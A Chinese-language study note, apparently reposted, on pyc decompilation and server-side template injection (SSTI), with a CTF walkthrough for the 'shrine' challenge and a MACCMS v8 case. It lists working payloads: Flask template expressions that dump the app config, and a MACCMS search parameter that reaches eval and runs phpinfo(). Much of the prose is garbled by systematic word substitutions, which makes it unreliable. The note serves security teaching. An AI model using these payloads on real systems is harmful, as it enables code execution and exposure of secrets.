pyc 文件是 py 文件编译后天生的字节码文件(byte code),pyc 文件颠末 python 解释器最终会天生机
器码运行。因此 pyc 文件是可以跨平台摆设的,类似 Java 的.class 文件,一般 py 文件改变后,都会
重新天生 pyc 文件。
真题附件:http://pan.baidu.com/s/1jGpB8DS
反编译平台:
https://tool.lu/pyc/
http://tools.bugscaner.com/decompyle/
反编译工具:https://github.com/wibiti/uncompyle2
#SSTI 入门-原理&分类&检测&分析&利用
1、什么是 SSTI?有什么毛病危害?
一般都是代码审计发现,黑盒很难,,, 现在用处不大,暂时可忽略。。
毛病成因就是服务端接收了用户的恶意输入以后,未经任那边理就将其作为 Web 应用模板内容的
一部分,模板引擎在进行目的编译渲染的过程中,实行了用户插入的可以粉碎模板的语句,因而可
能导致了敏感信息泄露、代码实行、GetShell 等题目。其影响范围主要取决于模版引擎的复杂性。
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以天生特定格式的文档,利用模板引擎来天生前端的html代码,模板引擎会提供一套天生html代码的步伐,然后只需要获取用户的数据,然后放到渲染函数里,然后天生模板+用户数据的前端html页面,然后反馈给欣赏器,出现在用户面前。
举个例子,我想买裙子,这时候我会打开某宝,直接在搜索框输入“裙子”,就会出现跟裙子相干的一系列商品,各种颜色,各种样式。那我们来想一下,这么多商品的各种信息是直接全部写死在页面上的嘛?那我们每次查找的商品都不一样,需要的内存就太大了
很显然,并不是,所以这里就表现了我们模板引擎的作用,它可以根据从数据库中及时提取出来的数据对html页面及时的渲染,这,就是模板引擎。
毛病成因就是服务端接收了用户的恶意输入以后,未经任那边理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目的编译渲染的过程中,实行了用户插入的可以粉碎模板的语句,因而大概导致了敏感信息泄露、代码实行、GetShell 等题目。其影响范围主要取决于模版引擎的复杂性。
2、如何判定检测 SSTI 毛病的存在?
-输入的数据会被欣赏器利用当前脚本语言调用剖析实行
用户输入的东西一定要被实行
3、SSTI 会产生在那些语言开发应用?
-见上图
4、SSTI 安全题目在生产情况那边产生?
-存在模版引用的地方,如 404 错误页面展示
-存在数据接收引用的地方,如模版剖析获取参数数据
有接收数据并实行渲染的地方。 好比 xxx.com/x.php?404_url=54 这个54假如被实行,来渲染新的页面, 新的页面显示的是5*4被实行后的效果。。
- <div class="style">
- <h1> 这里是样式模板</h1>
- <title> 这里是从数据库里面去取标题 </title>
- </div>
#SSTI 考点-CTF 靶场-[WesternCTF]shrine
1、源码分析 SSTI 考点
2、测试判定 SSTI 存在
3、分析代码过滤和 FLAG 存储
4、利用 Flask 两个函数利用获取
https://blog.csdn.net/houyanhua1/article/details/85470175
url_for()函数是用于构建操作指定函数的 URL
get_flashed_messages()函数是获取通报过来的数据
/shrine/{{url_for.globals}}
/shrine/{{url_for.globals[‘current_app’].config}}
/shrine/{{get_flashed_messages.globals}}
/shrine/{{get_flashed_messages.globals[‘current_app’].config}}
#SSTI 考点-CMS 源码-MACCMS_V8.X 实行
Payload:index.php?m=vod-search&wd={if-dddd:phpinfo()}{endif-dddd}
1、根据 wd 通报的代码找指向文件
2、index->vod->tpl->ifex->eval
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
